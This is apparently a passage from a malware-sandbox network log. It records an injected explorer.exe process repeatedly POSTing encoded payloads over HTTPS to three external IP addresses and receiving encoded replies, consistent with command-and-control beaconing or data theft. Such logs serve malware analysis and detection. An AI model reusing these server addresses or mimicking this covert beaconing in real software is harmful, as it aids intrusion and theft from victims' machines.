                                                          Data Ascii: Sq9j3L+6DMga+hyPEgxpOTlJbTGJ2k/Q1fqA9ZtTuLx5w7og9qyoMFAInup6JmXlH66JzHtCYRNZ9+IbtRh3EEJmOZ6H2gKzDR9WKDijklA7iX96pBlOHJcT2KYLfJWmd+xO4qIrnAL3enTG12FfIKKi0Drq4bD70gIIdthH06Q796pagi8uRH6rB5kguTl2yPp/svZL258LHE13oExTTU8raASCYcw08sKvr9CInssbf7b2+K68dGENh9Z2T71
                                                          2024-07-19 11:44:31 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:31 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:44:31 UTC685INData Raw: 31 70 68 48 50 4d 34 45 30 41 78 46 6a 32 2b 2b 47 35 68 4a 66 43 2b 41 4f 45 54 65 68 66 7a 77 63 33 64 79 4a 2f 6b 55 33 6a 39 37 43 73 43 30 35 72 31 46 49 4b 5a 6e 63 77 69 6d 67 6f 59 30 30 77 54 56 41 69 38 30 50 41 38 6c 6d 34 55 41 66 7a 6f 39 43 49 52 4e 34 70 65 51 45 69 30 4a 43 45 2f 65 6a 2f 53 70 6a 59 72 53 6a 38 30 31 2b 69 34 72 4b 51 66 2b 38 73 64 36 30 72 37 75 76 36 4c 71 75 51 36 5a 49 4e 78 35 70 35 61 31 6a 68 4d 73 6f 59 68 76 57 55 76 6f 64 4b 55 77 6e 51 6b 51 32 34 62 4c 55 34 62 76 39 56 56 6f 53 61 73 31 6a 73 6f 41 33 47 77 79 31 67 53 75 4b 6e 35 6b 6d 44 65 75 2b 76 35 4e 52 63 55 35 68 79 31 6d 61 75 37 30 34 6e 6b 45 49 6b 2f 4a 46 46 41 45 55 77 37 76 57 53 38 74 64 77 70 46 65 34 63 4a 55 4d 64 72 7a 45 76 6c 46 34 62
                                                          Data Ascii: 1phHPM4E0AxFj2++G5hJfC+AOETehfzwc3dyJ/kU3j97CsC05r1FIKZncwimgoY00wTVAi80PA8lm4UAfzo9CIRN4peQEi0JCE/ej/SpjYrSj801+i4rKQf+8sd60r7uv6LquQ6ZINx5p5a1jhMsoYhvWUvodKUwnQkQ24bLU4bv9VVoSas1jsoA3Gwy1gSuKn5kmDeu+v5NRcU5hy1mau704nkEIk/JFFAEUw7vWS8tdwpFe4cJUMdrzEvlF4b


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.557799167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:32 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:44:32 UTC1122OUTData Raw: 64 70 57 67 33 4b 76 62 4d 44 61 57 75 61 32 50 41 2f 61 38 35 38 64 69 71 75 30 62 67 33 56 75 52 38 5a 30 34 68 72 6c 35 64 41 6e 58 67 2f 46 58 78 71 6c 44 67 56 5a 7a 4f 43 34 46 74 51 6b 74 45 31 73 56 71 62 6f 44 39 45 79 52 51 5a 2f 2b 6c 37 44 66 7a 47 4a 48 6d 67 2f 4c 49 49 68 4f 6d 56 52 62 6b 75 2f 6b 4f 75 6a 55 7a 65 6a 4f 68 67 6c 54 68 64 62 69 4c 45 52 6b 36 68 76 44 68 6b 35 2b 63 6d 46 67 31 48 6e 46 53 6c 76 61 59 62 2b 76 57 5a 4e 4c 32 4b 7a 68 50 65 71 48 33 2b 77 6a 76 43 66 70 36 52 73 55 34 2f 4d 41 69 36 2b 41 57 74 4a 36 79 70 31 6c 4b 71 4f 79 4a 34 45 64 74 4e 73 67 2b 7a 30 30 2f 53 43 49 67 54 52 38 69 4e 64 73 5a 4c 69 53 54 4f 67 38 36 65 73 46 6c 2f 34 76 34 70 2b 6a 6a 4c 5a 75 58 4c 79 46 78 46 33 63 2b 43 53 42 2f 7a
                                                          Data Ascii: dpWg3KvbMDaWua2PA/a858diqu0bg3VuR8Z04hrl5dAnXg/FXxqlDgVZzOC4FtQktE1sVqboD9EyRQZ/+l7DfzGJHmg/LIIhOmVRbku/kOujUzejOhglThdbiLERk6hvDhk5+cmFg1HnFSlvaYb+vWZNL2KzhPeqH3+wjvCfp6RsU4/MAi6+AWtJ6yp1lKqOyJ4EdtNsg+z00/SCIgTR8iNdsZLiSTOg86esFl/4v4p+jjLZuXLyFxF3c+CSB/z
                                                          2024-07-19 11:44:33 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:32 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:44:33 UTC685INData Raw: 42 32 75 74 6f 45 75 63 6c 2f 55 44 78 6e 39 54 43 5a 53 4c 6a 4f 4c 6e 50 33 78 37 53 70 6f 78 5a 79 4e 66 77 49 35 64 36 6d 4a 6b 73 45 50 4c 45 62 58 4e 67 5a 45 45 4b 61 39 4b 5a 7a 57 74 4a 2b 76 6f 75 43 66 4f 51 47 54 72 6b 42 4a 51 41 51 4a 30 76 67 75 42 55 39 57 68 6b 61 58 67 2b 30 57 44 54 7a 45 32 52 69 59 4b 30 65 65 4d 64 61 36 62 30 31 61 34 34 6f 42 6e 58 74 55 38 78 41 5a 51 75 2f 51 57 2f 79 51 78 4f 4b 6b 6a 37 6f 54 58 63 45 63 30 74 6c 66 73 52 59 49 70 4d 77 75 41 4c 78 72 44 56 49 52 2b 56 68 4b 51 38 57 38 46 79 30 53 6c 34 79 77 2b 4e 33 48 66 67 78 67 6f 33 4c 76 78 77 44 4d 51 33 6d 5a 6f 30 68 6b 61 43 35 58 4c 4f 2f 43 34 58 64 41 4e 66 6b 4a 54 2f 70 7a 4e 45 73 6e 65 4b 4c 6b 66 73 56 6c 37 59 71 73 6f 47 66 61 66 75 37 62
                                                          Data Ascii: B2utoEucl/UDxn9TCZSLjOLnP3x7SpoxZyNfwI5d6mJksEPLEbXNgZEEKa9KZzWtJ+vouCfOQGTrkBJQAQJ0vguBU9WhkaXg+0WDTzE2RiYK0eeMda6b01a44oBnXtU8xAZQu/QW/yQxOKkj7oTXcEc0tlfsRYIpMwuALxrDVIR+VhKQ8W8Fy0Sl4yw+N3Hfgxgo3LvxwDMQ3mZo0hkaC5XLO/C4XdANfkJT/pzNEsneKLkfsVl7YqsoGfafu7b


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.557800107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:33 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:44:33 UTC1267OUTData Raw: 68 51 50 31 7a 76 35 39 31 38 61 45 53 47 57 57 46 71 59 61 47 68 30 45 50 50 79 61 74 69 63 6b 4e 67 41 77 66 6b 71 55 69 6b 2f 52 42 43 51 36 74 37 6b 39 4b 71 67 70 73 46 53 66 49 6e 75 33 46 33 77 65 2b 6b 4d 66 6c 74 6c 73 6b 75 77 63 6b 72 34 2b 73 76 73 46 74 43 56 51 79 6e 68 62 4f 43 75 35 47 36 33 55 65 4e 6b 66 62 36 65 77 6c 6b 67 6a 73 4c 72 69 34 34 41 38 59 78 6a 4d 44 75 53 58 6a 55 64 50 78 61 62 4e 62 64 38 36 77 48 68 62 65 70 6d 34 31 72 52 41 65 63 67 67 72 30 67 66 34 62 6b 56 64 41 59 70 62 66 36 2f 41 30 4e 64 74 62 75 49 42 70 59 4c 39 50 6c 62 74 45 74 6c 48 76 4d 75 66 63 58 56 74 31 66 64 39 53 68 71 63 76 36 39 7a 45 62 54 38 50 4b 55 74 4d 35 76 48 47 31 52 6e 52 4b 77 37 31 6a 51 73 47 58 66 37 51 61 6e 4b 37 6b 43 4f 36 74
                                                          Data Ascii: hQP1zv5918aESGWWFqYaGh0EPPyatickNgAwfkqUik/RBCQ6t7k9KqgpsFSfInu3F3we+kMfltlskuwckr4+svsFtCVQynhbOCu5G63UeNkfb6ewlkgjsLri44A8YxjMDuSXjUdPxabNbd86wHhbepm41rRAecggr0gf4bkVdAYpbf6/A0NdtbuIBpYL9PlbtEtlHvMufcXVt1fd9Shqcv69zEbT8PKUtM5vHG1RnRKw71jQsGXf7QanK7kCO6t
                                                          2024-07-19 11:44:35 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:34 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:44:35 UTC685INData Raw: 44 78 79 79 59 4c 6e 68 76 67 36 5a 59 37 63 67 69 6d 46 62 4c 37 61 66 5a 64 47 38 2f 62 74 36 34 43 4e 4c 76 64 72 55 52 75 31 70 72 58 70 68 62 63 4b 67 4d 37 76 49 44 47 55 37 66 37 6d 43 6c 56 6e 58 75 47 65 31 4f 63 45 4c 50 4b 31 52 69 33 46 43 76 64 63 45 77 48 4e 67 2f 79 5a 67 48 6f 55 6f 4c 61 2b 69 2f 4d 51 59 62 52 56 2f 75 2b 79 33 6e 7a 4e 4a 56 42 64 68 66 59 68 70 72 6e 34 4a 67 56 37 59 42 41 64 39 68 63 70 38 46 51 4b 2f 6b 6c 46 4d 6f 4e 2b 7a 41 63 63 54 42 65 4a 66 6c 35 4c 74 32 45 57 6b 45 31 34 47 66 76 43 55 68 31 63 55 42 6f 55 43 66 48 32 6b 34 51 37 38 7a 65 37 72 2b 48 48 47 57 65 74 34 75 32 7a 53 4e 32 6b 6b 72 65 65 4f 76 6d 69 35 42 76 2b 70 44 61 49 38 57 49 41 6a 2f 6a 31 6b 47 44 6c 47 64 51 47 77 37 75 59 57 39 59 50
                                                          Data Ascii: DxyyYLnhvg6ZY7cgimFbL7afZdG8/bt64CNLvdrURu1prXphbcKgM7vIDGU7f7mClVnXuGe1OcELPK1Ri3FCvdcEwHNg/yZgHoUoLa+i/MQYbRV/u+y3nzNJVBdhfYhprn4JgV7YBAd9hcp8FQK/klFMoN+zAccTBeJfl5Lt2EWkE14GfvCUh1cUBoUCfH2k4Q78ze7r+HHGWet4u2zSN2kkreeOvmi5Bv+pDaI8WIAj/j1kGDlGdQGw7uYW9YP


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.557801107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:35 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:44:35 UTC1267OUTData Raw: 46 72 4b 73 44 52 4e 68 4b 4e 4f 6a 72 4e 6f 6b 62 54 62 46 68 66 42 78 54 71 36 68 6a 6a 65 48 69 61 4b 70 47 35 50 57 56 61 56 61 44 50 66 55 5a 39 36 2b 70 47 33 70 70 2f 4c 39 62 7a 31 63 63 69 30 4d 36 52 2f 52 4e 66 4f 6d 55 58 34 46 31 30 76 70 43 43 4c 68 4c 69 4b 59 34 6d 65 34 63 66 48 74 45 55 6c 52 39 54 49 4f 45 43 53 79 7a 54 79 71 6b 72 76 75 73 76 39 46 45 44 52 51 57 43 42 59 67 39 66 56 31 7a 6b 69 63 36 39 4b 37 34 48 77 56 32 72 49 70 6f 78 73 45 4a 31 78 6d 41 6c 49 58 4b 58 51 49 43 50 35 70 59 62 4f 48 36 2f 62 56 62 33 31 6c 68 69 33 63 51 73 37 6b 76 66 5a 76 67 6d 33 5a 54 47 54 4a 68 49 41 6c 63 4e 66 69 34 43 62 6c 73 33 35 2b 54 30 63 33 72 70 50 52 45 65 62 52 76 65 63 48 42 69 75 47 52 71 36 54 51 6c 4b 44 42 77 79 63 6c 73
                                                          Data Ascii: FrKsDRNhKNOjrNokbTbFhfBxTq6hjjeHiaKpG5PWVaVaDPfUZ96+pG3pp/L9bz1cci0M6R/RNfOmUX4F10vpCCLhLiKY4me4cfHtEUlR9TIOECSyzTyqkrvusv9FEDRQWCBYg9fV1zkic69K74HwV2rIpoxsEJ1xmAlIXKXQICP5pYbOH6/bVb31lhi3cQs7kvfZvgm3ZTGTJhIAlcNfi4Cbls35+T0c3rpPREebRvecHBiuGRq6TQlKDBwycls
                                                          2024-07-19 11:44:37 UTC141INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:36 GMT
                                                          Content-Type: application/vnd.ms-fontobject
                                                          Connection: close
                                                          2024-07-19 11:44:37 UTC685INData Raw: 36 71 44 59 55 62 4c 72 72 4f 44 38 70 58 36 52 61 4c 69 67 49 36 65 61 33 59 6d 38 66 70 4b 79 48 65 4c 50 73 41 4a 56 69 72 7a 2f 6e 74 34 30 65 77 2b 4a 75 45 36 59 75 58 6e 64 4b 45 6e 69 75 55 32 71 6a 53 6b 6e 50 72 69 55 33 4c 58 61 36 31 39 31 31 4a 31 79 4b 37 70 4c 66 6c 4c 68 33 65 69 55 31 51 57 67 53 7a 43 67 69 50 4b 44 71 47 57 44 34 74 30 4d 67 31 6d 61 61 77 52 48 42 78 73 45 46 44 61 6f 4a 47 6d 6e 75 4a 36 69 6c 52 64 48 30 66 73 50 45 32 35 47 46 34 6b 68 4c 4c 2b 6c 34 4a 78 75 52 76 4f 78 44 5a 2b 72 33 42 36 70 72 42 4b 33 50 69 4b 4e 6b 5a 4e 76 30 2f 44 45 49 63 4c 4c 72 4c 6d 31 52 6a 64 31 4d 4f 4b 77 64 39 57 54 79 41 57 73 67 61 34 74 63 38 33 43 69 50 31 63 34 4a 44 52 53 6a 2b 79 54 63 73 46 32 77 71 53 35 49 43 52 70 36 2b
                                                          Data Ascii: 6qDYUbLrrOD8pX6RaLigI6ea3Ym8fpKyHeLPsAJVirz/nt40ew+JuE6YuXndKEniuU2qjSknPriU3LXa61911J1yK7pLflLh3eiU1QWgSzCgiPKDqGWD4t0Mg1maawRHBxsEFDaoJGmnuJ6ilRdH0fsPE25GF4khLL+l4JxuRvOxDZ+r3B6prBK3PiKNkZNv0/DEIcLLrLm1Rjd1MOKwd9WTyAWsga4tc83CiP1c4JDRSj+yTcsF2wqS5ICRp6+


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.557802167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:37 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:44:37 UTC1267OUTData Raw: 6d 4e 35 35 7a 30 6e 6d 41 62 79 37 61 30 36 63 53 41 55 42 6a 6c 4c 49 35 66 79 4f 4e 7a 77 52 35 4f 7a 75 74 49 48 37 55 66 42 42 6e 79 72 49 51 75 6b 61 39 31 63 2f 33 7a 75 58 38 30 2f 39 41 74 70 47 4d 7a 77 48 6a 2f 4c 42 67 55 2b 65 73 74 61 4c 44 47 34 2f 58 6a 6a 52 77 51 48 46 68 41 32 6c 57 5a 64 6b 48 31 76 4b 66 76 34 4d 37 6a 6f 4e 79 55 42 73 6d 78 54 6f 64 55 61 43 56 73 53 38 70 5a 41 49 6a 57 4d 71 4d 55 51 4b 51 2f 43 38 33 4a 71 78 2b 4f 49 72 56 6c 78 68 6c 6e 62 69 6f 65 6b 5a 4e 49 38 6a 52 75 39 55 74 69 6a 72 63 32 72 43 4b 6c 51 55 67 53 4b 73 49 4e 49 74 6c 38 74 59 4a 76 34 30 74 58 4a 41 66 4e 65 32 6e 38 41 43 31 78 6c 46 45 69 41 75 46 48 36 71 57 6f 76 44 74 7a 30 39 35 46 6a 4e 66 68 31 38 6c 61 4e 39 2b 70 48 2f 68 75 44
                                                          Data Ascii: mN55z0nmAby7a06cSAUBjlLI5fyONzwR5OzutIH7UfBBnyrIQuka91c/3zuX80/9AtpGMzwHj/LBgU+estaLDG4/XjjRwQHFhA2lWZdkH1vKfv4M7joNyUBsmxTodUaCVsS8pZAIjWMqMUQKQ/C83Jqx+OIrVlxhlnbioekZNI8jRu9Utijrc2rCKlQUgSKsINItl8tYJv40tXJAfNe2n8AC1xlFEiAuFH6qWovDtz095FjNfh18laN9+pH/huD
                                                          2024-07-19 11:44:38 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:38 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:44:38 UTC685INData Raw: 76 39 51 6c 51 63 70 38 46 57 4e 45 6d 37 75 7a 33 4e 57 5a 31 5a 55 71 75 58 6d 6b 70 65 46 6a 73 58 36 77 6a 72 62 43 59 72 33 78 67 53 56 70 74 62 5a 4a 53 41 69 59 42 65 70 66 6a 41 70 6f 54 48 53 6b 69 49 4d 31 6d 79 4a 41 63 6f 47 35 35 65 45 4d 6c 4b 33 68 34 44 61 59 43 58 70 78 32 53 64 47 37 76 6a 48 6f 39 37 34 4b 54 30 72 42 4e 69 77 36 37 59 52 70 6f 66 6f 36 59 32 58 79 32 51 59 4b 77 6a 62 55 2b 73 42 2f 32 63 67 36 4d 67 41 36 4c 54 37 58 6d 67 55 6f 49 70 70 72 54 38 4d 4c 4c 30 6c 53 72 43 54 74 67 73 76 47 66 47 6c 43 4a 44 57 71 52 63 73 37 79 54 74 43 6c 36 79 71 76 47 76 57 42 49 6e 65 63 47 51 49 64 41 58 6b 74 4a 50 71 6c 4b 34 6d 48 63 4f 48 55 65 4c 42 6b 6e 5a 41 76 53 56 2b 42 69 4a 4c 47 6f 39 31 67 6f 34 4a 45 51 47 70 6f 72
                                                          Data Ascii: v9QlQcp8FWNEm7uz3NWZ1ZUquXmkpeFjsX6wjrbCYr3xgSVptbZJSAiYBepfjApoTHSkiIM1myJAcoG55eEMlK3h4DaYCXpx2SdG7vjHo974KT0rBNiw67YRpofo6Y2Xy2QYKwjbU+sB/2cg6MgA6LT7XmgUoIpprT8MLL0lSrCTtgsvGfGlCJDWqRcs7yTtCl6yqvGvWBInecGQIdAXktJPqlK4mHcOHUeLBknZAvSV+BiJLGo91go4JEQGpor


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.557803107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:39 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:44:39 UTC1267OUTData Raw: 42 58 31 66 45 57 59 76 30 78 77 78 6a 37 56 4f 37 53 48 46 39 52 77 35 4a 42 76 79 41 48 74 56 58 78 37 35 58 72 6b 65 47 30 43 67 50 61 52 7a 50 59 5a 32 6f 6b 35 50 6b 75 76 6f 66 4f 43 6b 4c 66 6b 73 70 69 75 35 61 38 48 38 75 79 62 65 70 43 6d 54 5a 78 5a 4f 4f 69 37 4a 6c 31 69 4b 55 61 2b 31 4d 36 64 71 77 4e 32 67 33 32 6b 54 49 63 41 53 66 32 4a 7a 77 75 6f 50 31 64 54 39 53 41 42 72 58 37 77 64 7a 36 33 51 44 43 39 57 70 6b 6a 39 6b 44 65 78 55 4e 44 4f 70 57 66 47 32 44 4c 59 46 48 51 59 71 6c 49 70 51 68 37 61 53 6a 73 61 71 46 39 4e 47 64 78 5a 63 66 31 61 68 4d 62 49 35 7a 50 2f 4e 67 4a 4f 78 45 49 43 6c 6d 34 62 67 54 37 52 4f 75 59 43 39 71 48 64 79 77 47 43 73 48 70 4f 6f 68 61 36 58 4b 45 47 66 4c 79 64 73 35 63 34 61 70 5a 56 51 58 65
                                                          Data Ascii: BX1fEWYv0xwxj7VO7SHF9Rw5JBvyAHtVXx75XrkeG0CgPaRzPYZ2ok5PkuvofOCkLfkspiu5a8H8uybepCmTZxZOOi7Jl1iKUa+1M6dqwN2g32kTIcASf2JzwuoP1dT9SABrX7wdz63QDC9Wpkj9kDexUNDOpWfG2DLYFHQYqlIpQh7aSjsaqF9NGdxZcf1ahMbI5zP/NgJOxEIClm4bgT7ROuYC9qHdywGCsHpOoha6XKEGfLyds5c4apZVQXe
                                                          2024-07-19 11:44:40 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:40 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:44:40 UTC685INData Raw: 6b 68 65 51 73 4a 6e 4e 48 76 38 34 64 68 77 4a 7a 58 71 32 37 6c 56 4f 68 2f 36 66 6b 56 38 79 6a 53 59 6d 77 51 6e 58 47 62 43 6b 54 63 4a 4c 52 6e 43 36 6a 51 38 74 59 78 63 56 48 61 47 7a 73 4b 56 78 46 63 50 74 42 51 6d 72 73 4f 66 4a 77 46 4a 69 34 62 55 2f 76 63 51 6c 4e 61 42 6c 37 42 56 5a 4d 79 65 56 31 65 33 33 32 64 33 66 64 72 6c 50 4b 6a 66 4d 42 70 5a 37 6e 76 32 32 45 32 47 55 56 55 38 71 56 39 67 38 76 39 64 59 59 58 48 58 4f 48 34 77 69 47 56 4a 53 6b 32 38 4d 52 6b 31 70 6c 69 35 76 6b 52 2b 77 46 39 42 6c 62 73 62 75 49 39 4d 6b 54 48 73 75 73 55 55 59 42 31 39 54 4d 74 59 36 7a 79 55 33 37 32 55 68 51 55 6c 76 36 35 33 79 57 57 6e 70 33 4a 73 46 78 6c 64 35 31 64 79 42 4c 31 4e 4b 35 59 45 71 37 46 6a 32 6f 42 77 6e 39 53 76 73 55 44
                                                          Data Ascii: kheQsJnNHv84dhwJzXq27lVOh/6fkV8yjSYmwQnXGbCkTcJLRnC6jQ8tYxcVHaGzsKVxFcPtBQmrsOfJwFJi4bU/vcQlNaBl7BVZMyeV1e332d3fdrlPKjfMBpZ7nv22E2GUVU8qV9g8v9dYYXHXOH4wiGVJSk28MRk1pli5vkR+wF9BlbsbuI9MkTHsusUUYB19TMtY6zyU372UhQUlv653yWWnp3JsFxld51dyBL1NK5YEq7Fj2oBwn9SvsUD


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.557804107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:41 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:44:41 UTC1267OUTData Raw: 52 56 42 4f 55 70 30 35 4e 41 59 79 59 4f 79 6e 57 7a 30 59 36 4e 43 50 67 4b 42 45 4e 54 73 52 73 39 48 52 55 6e 4b 34 75 75 65 33 59 4b 2f 4c 6d 7a 47 52 2b 37 74 4a 71 62 72 6d 73 68 4b 5a 72 6a 4f 66 39 4c 73 7a 4d 63 51 56 34 34 65 30 54 61 58 59 70 49 63 46 4d 41 68 70 46 45 4f 73 52 35 75 4c 76 4e 42 4b 56 77 32 49 65 70 56 44 6e 70 4a 62 59 71 62 37 62 44 6e 66 69 4a 32 56 4b 6e 72 77 67 6b 38 7a 34 43 78 4d 2f 59 6c 51 2b 30 57 6e 71 4e 77 69 76 57 62 6e 49 6f 2f 5a 44 32 6b 69 50 4a 4a 4b 7a 55 46 62 42 35 66 39 59 48 73 7a 41 79 5a 65 6b 46 71 45 70 62 6d 31 33 4f 6a 6c 36 4e 2f 69 69 6d 76 5a 53 64 37 39 5a 36 75 30 2f 39 67 64 6e 2f 31 2b 6d 30 38 49 6f 63 38 79 57 68 6b 4b 63 4c 53 51 46 65 39 79 71 4f 42 2f 73 56 32 51 51 79 4d 73 67 67 72
                                                          Data Ascii: RVBOUp05NAYyYOynWz0Y6NCPgKBENTsRs9HRUnK4uue3YK/LmzGR+7tJqbrmshKZrjOf9LszMcQV44e0TaXYpIcFMAhpFEOsR5uLvNBKVw2IepVDnpJbYqb7bDnfiJ2VKnrwgk8z4CxM/YlQ+0WnqNwivWbnIo/ZD2kiPJJKzUFbB5f9YHszAyZekFqEpbm13Ojl6N/iimvZSd79Z6u0/9gdn/1+m08Ioc8yWhkKcLSQFe9yqOB/sV2QQyMsggr
                                                          2024-07-19 11:44:42 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:42 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:44:42 UTC685INData Raw: 57 76 71 4c 33 59 34 50 64 6c 73 74 6d 67 34 49 52 48 47 75 6e 79 31 73 55 62 6a 76 47 56 6b 43 42 57 38 2f 4a 2b 52 33 79 33 54 70 39 44 78 6c 71 39 71 67 70 6c 43 58 6c 44 78 7a 6f 33 6f 4c 66 5a 48 2f 30 71 7a 66 4f 4b 34 62 79 45 77 58 45 6d 73 34 5a 4c 54 54 62 42 45 41 4f 4c 45 42 62 2f 37 77 69 6a 33 69 5a 66 65 76 35 6d 78 47 78 73 6f 50 6e 38 6c 52 61 54 53 7a 44 76 34 6d 4f 52 55 64 2b 64 37 35 43 48 6d 2f 34 6b 47 4a 2b 52 59 47 68 6c 52 4b 55 65 71 6d 31 56 49 77 76 35 54 49 73 7a 4d 33 4c 75 4d 75 71 52 77 57 55 6d 4d 48 61 2b 57 47 65 52 72 43 2b 72 37 61 71 68 69 72 66 47 6d 44 55 70 6d 4e 67 69 35 4b 36 68 62 64 6d 69 6e 76 38 73 63 30 52 45 39 64 71 59 36 77 35 38 30 73 37 68 2f 78 6e 61 4c 71 4f 61 56 38 62 65 72 53 2b 39 57 77 50 73 4d
                                                          Data Ascii: WvqL3Y4Pdlstmg4IRHGuny1sUbjvGVkCBW8/J+R3y3Tp9Dxlq9qgplCXlDxzo3oLfZH/0qzfOK4byEwXEms4ZLTTbBEAOLEBb/7wij3iZfev5mxGxsoPn8lRaTSzDv4mORUd+d75CHm/4kGJ+RYGhlRKUeqm1VIwv5TIszM3LuMuqRwWUmMHa+WGeRrC+r7aqhirfGmDUpmNgi5K6hbdminv8sc0RE9dqY6w580s7h/xnaLqOaV8berS+9WwPsM


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.557805167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:43 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:44:43 UTC1267OUTData Raw: 6e 59 59 64 53 68 49 71 70 54 56 69 58 31 2f 78 76 2b 56 46 64 38 46 2b 42 4c 77 30 70 75 33 2b 36 54 66 43 33 62 42 72 62 69 35 30 2f 64 31 44 4a 43 44 6b 4b 6d 6d 67 74 4c 43 4d 48 4b 6b 57 7a 31 30 4d 73 4b 4d 35 6b 78 30 5a 71 6b 35 67 59 65 6b 49 46 62 2b 31 42 4f 78 65 64 54 42 59 33 39 39 42 4c 47 31 68 6c 32 36 48 71 68 5a 45 37 58 55 6a 39 32 6f 4e 6c 52 2b 48 6f 35 4d 56 4b 4b 55 51 39 31 56 41 47 57 4b 4b 6e 33 56 4d 69 6f 51 43 31 51 6e 4a 54 62 72 75 4e 2f 65 57 70 73 41 56 4e 78 51 36 71 2f 56 55 53 66 44 53 72 68 4b 55 31 7a 62 50 78 34 30 48 6f 2b 79 7a 6e 79 72 54 46 6f 34 77 6f 52 67 63 53 54 55 65 45 52 6e 35 30 75 71 4b 70 55 4b 35 56 2f 36 34 6b 78 45 74 50 48 39 70 6c 30 58 63 43 47 4a 64 42 4b 77 30 57 32 5a 75 75 4a 55 61 47 52 7a
                                                          Data Ascii: nYYdShIqpTViX1/xv+VFd8F+BLw0pu3+6TfC3bBrbi50/d1DJCDkKmmgtLCMHKkWz10MsKM5kx0Zqk5gYekIFb+1BOxedTBY399BLG1hl26HqhZE7XUj92oNlR+Ho5MVKKUQ91VAGWKKn3VMioQC1QnJTbruN/eWpsAVNxQ6q/VUSfDSrhKU1zbPx40Ho+yznyrTFo4woRgcSTUeERn50uqKpUK5V/64kxEtPH9pl0XcCGJdBKw0W2ZuuJUaGRz
                                                          2024-07-19 11:44:44 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:44 GMT
                                                          Content-Type: text/plain; charset=utf-8
